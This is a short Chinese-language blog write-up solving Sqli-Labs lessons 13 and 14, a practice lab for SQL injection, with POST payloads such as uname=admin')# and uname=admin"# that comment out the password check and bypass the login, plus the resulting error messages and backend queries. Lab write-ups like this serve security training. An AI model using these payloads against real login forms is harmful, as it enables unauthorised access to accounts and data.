Chybeta

Sqli-Labs:Less13~14-writeup

Sqli-Labs是用来练习sql注入的好平台。project地址:https://github.com/Audi-1/sqli-labs
本文测试环境:使用phpstudy集成环境。mysql版本:5.5.53

Less-13 POST- Double Injection -Single quotes -String-with twist
Less-14 POST- Double Injection -Single quotes -String-with twist

Less 13

当post数据为:

1
uname=admin'&passwd=chybeta&submit=Submit

报错语句:

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'chybeta') LIMIT 0,1' at line 1

说明有括号保护,需闭合。

当post数据为:

1
uname=admin')#&passwd=chybeta&submit=Submit

页面返回提示说已经登陆成功。

后台查询语句为:

1
SELECT username, password FROM users WHERE username=('admin')#`') and password=('chybeta') LIMIT 0,1

Less 14

当post数据为:

1
uname=admin"&passwd=chybeta&submit=Submit

报错语句为:

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'chybeta" LIMIT 0,1' at line 1

当post数据为:

1
uname=admin&passwd=chybeta"&submit=Submit

报错语句为:

1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"chybeta"" LIMIT 0,1' at line 1

从以上几条语句知道,需要闭合双引号。

payload:

1
uname=admin"#&passwd=chybeta&submit=Submit

页面返回提示说已经登陆成功。

后台查询语句为:

1
SELECT username, password FROM users WHERE username="admin"#" and password="chybeta" LIMIT 0,1

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】